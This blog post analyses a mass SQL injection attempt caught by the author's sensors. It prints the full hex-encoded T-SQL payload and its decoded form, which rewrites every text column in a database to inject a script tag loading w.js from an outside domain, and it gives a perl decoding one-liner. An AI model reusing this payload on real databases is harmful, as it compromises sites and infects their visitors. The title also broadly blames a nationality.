Information, OpenSourceSoftware, Security

Those Chinese!

As an exercise for my self, and because I’m curious by nature… I had to find out what kind of Chinese attacks are hitting my sensors today. One thing is to see that its a SQLi attempt,*move on*, another one is to really see what they are trying to do. And by using Google, one can get an idea on the extent of such an attack. So here goes:

The URL that is triggering my sensors:
;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302920444
5434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612
C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F
4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746520
5B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E
636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C
2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2
D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444
5414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1

If you can decrypt the hex-string, just by looking at it, you are away ahead of me… If not, you are probably just normal, and perl could be a good friend:

# echo "0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F722043
5552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061
2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D3233312
06F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20
40542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275
D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F73637269
70743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687
474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020
5461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
|perl -pe 's/(..)(..)/chr(hex($1)).chr(hex($2))/ge' | hexdump -C

Will give you something like this:

00 44 45 43 4c 41 52 45 20 40 54 20 76 61 72 63 |.DECLARE @T varc|
68 61 72 28 32 35 35 29 2c 40 43 20 76 61 72 63 |har(255),@C varc|
68 61 72 28 34 30 30 30 29 20 44 45 43 4c 41 52 |har(4000) DECLAR|
45 20 54 61 62 6c 65 5f 43 75 72 73 6f 72 20 43 |E Table_Cursor C|
55 52 53 4f 52 20 46 4f 52 20 73 65 6c 65 63 74 |URSOR FOR select|
20 61 2e 6e 61 6d 65 2c 62 2e 6e 61 6d 65 20 66 | a.name,b.name f|
72 6f 6d 20 73 79 73 6f 62 6a 65 63 74 73 20 61 |rom sysobjects a|
2c 73 79 73 63 6f 6c 75 6d 6e 73 20 62 20 77 68 |,syscolumns b wh|
65 72 65 20 61 2e 69 64 3d 62 2e 69 64 20 61 6e |ere a.id=b.id an|
64 20 61 2e 78 74 79 70 65 3d 27 75 27 20 61 6e |d a.xtype=’u’ an|
64 20 28 62 2e 78 74 79 70 65 3d 39 39 20 6f 72 |d (b.xtype=99 or|
20 62 2e 78 74 79 70 65 3d 33 35 20 6f 72 20 62 | b.xtype=35 or b|
2e 78 74 79 70 65 3d 32 33 31 20 6f 72 20 62 2e |.xtype=231 or b.|
78 74 79 70 65 3d 31 36 37 29 20 4f 50 45 4e 20 |xtype=167) OPEN |
54 61 62 6c 65 5f 43 75 72 73 6f 72 20 46 45 54 |Table_Cursor FET|
43 48 20 4e 45 58 54 20 46 52 4f 4d 20 20 54 61 |CH NEXT FROM Ta|
62 6c 65 5f 43 75 72 73 6f 72 20 49 4e 54 4f 20 |ble_Cursor INTO |
40 54 2c 40 43 20 57 48 49 4c 45 28 40 40 46 45 |@T,@C WHILE(@@FE|
54 43 48 5f 53 54 41 54 55 53 3d 30 29 20 42 45 |TCH_STATUS=0) BE|
47 49 4e 20 65 78 65 63 28 27 75 70 64 61 74 65 |GIN exec(‘update|
20 5b 27 2b 40 54 2b 27 5d 20 73 65 74 20 5b 27 | [‘+@T+’] set [‘|
2b 40 43 2b 27 5d 3d 27 27 22 3e 3c 2f 74 69 74 |+@C+’]=””></tit|
6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 |le><script src=”|
68 74 74 70 3a 2f 2f 77 77 77 30 2e 64 6f 75 68 |http://www0.douh|
75 6e 71 6e 2e 63 6e 2f 63 73 72 73 73 2f 77 2e |unqn.cn/csrss/w.|
6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d |js”></script><!-|
2d 27 27 2b 5b 27 2b 40 43 2b 27 5d 20 77 68 65 |-”+[‘+@C+’] whe|
72 65 20 27 2b 40 43 2b 27 20 6e 6f 74 20 6c 69 |re ‘+@C+’ not li|
6b 65 20 27 27 25 22 3e 3c 2f 74 69 74 6c 65 3e |ke ”%”></title>|
3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 |<script src=”htt|
70 3a 2f 2f 77 77 77 30 2e 64 6f 75 68 75 6e 71 |p://www0.douhunq|
6e 2e 63 6e 2f 63 73 72 73 73 2f 77 2e 6a 73 22 |n.cn/csrss/w.js”|
3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 27 27 |></script><!–”|
27 29 46 45 54 43 48 20 4e 45 58 54 20 46 52 4f |’)FETCH NEXT FRO|
4d 20 20 54 61 62 6c 65 5f 43 75 72 73 6f 72 20 |M Table_Cursor |
49 4e 54 4f 20 40 54 2c 40 43 20 45 4e 44 20 43 |INTO @T,@C END C|
4c 4f 53 45 20 54 61 62 6c 65 5f 43 75 72 73 6f |LOSE Table_Curso|
72 20 44 45 41 4c 4c 4f 43 41 54 45 20 54 61 62 |r DEALLOCATE Tab|
6c 65 5f 43 75 72 73 6f 37 32 0a |le_Curso72.|

Which spells out two tings for me. First its the SQL command it self, which is cool 🙂

Then we have the evil java script which it wants to effect those who surf you website!

http://www0.douhunqn.cn/csrss/w.js

Then, for the Google search of this specific attack:

http://www.google.no/search?hl=en&q="script+src%3Dhttp%3A%2F%2Fwww0.douhunqn.cn%2Fcsrss%2Fw.js"&btnG=Search

Which gives me 18,800 hits at the moment. Editing the search, makes things look even worse 🙂
I even see banks in the hits from Google 🙂


UPDATE: 5 Hours later – Google reports 19,700 Hits
UPDATE: 27 Hours later – Google reports 2,070 Hits

Advertisements
Standard

One thought on “Those Chinese!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s